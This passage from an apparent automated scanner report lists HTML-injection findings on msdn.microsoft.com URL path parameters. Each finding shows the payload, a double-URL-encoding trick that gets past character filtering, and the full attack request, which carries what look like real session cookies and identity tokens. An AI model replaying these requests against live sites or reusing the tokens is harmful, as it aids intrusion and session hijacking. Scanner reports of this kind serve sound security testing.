19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9227
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd208104(PROT.10).aspx32d6f"><a>13799d99661" />
...[SNIP]...

2.46. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81ea%2522%253e%253ca%253e6a2a9f3482d was submitted in the REST URL parameter 1. This input was echoed as e81ea"><a>6a2a9f3482d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-use81ea%2522%253e%253ca%253e6a2a9f3482d/library/dd582937(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use81ea"><a>6a2a9f3482d/library/dd582937(office.11" />
...[SNIP]...

2.47. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74342%2522%253e%253ca%253eb95c098f3cf was submitted in the REST URL parameter 2. This input was echoed as 74342"><a>b95c098f3cf in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library74342%2522%253e%253ca%253eb95c098f3cf/dd582937(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library74342"><a>b95c098f3cf/dd582937(office.11" />
...[SNIP]...

2.48. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cf4%2522%253e%253ca%253ea00ac7dd75a was submitted in the REST URL parameter 3. This input was echoed as f1cf4"><a>a00ac7dd75a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582937(office.11f1cf4%2522%253e%253ca%253ea00ac7dd75a HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582937(office.11f1cf4"><a>a00ac7dd75a" />
...[SNIP]...

2.49. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46aa7%2522%253e%253ca%253e2b28de78233 was submitted in the REST URL parameter 1. This input was echoed as 46aa7"><a>2b28de78233 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us46aa7%2522%253e%253ca%253e2b28de78233/library/dd582937(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us46aa7"><a>2b28de78233/library/dd582937(office.11)" />
...[SNIP]...

2.50. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad5e%2522%253e%253ca%253e9e2edfb91df was submitted in the REST URL parameter 2. This input was echoed as 9ad5e"><a>9e2edfb91df in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9ad5e%2522%253e%253ca%253e9e2edfb91df/dd582937(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
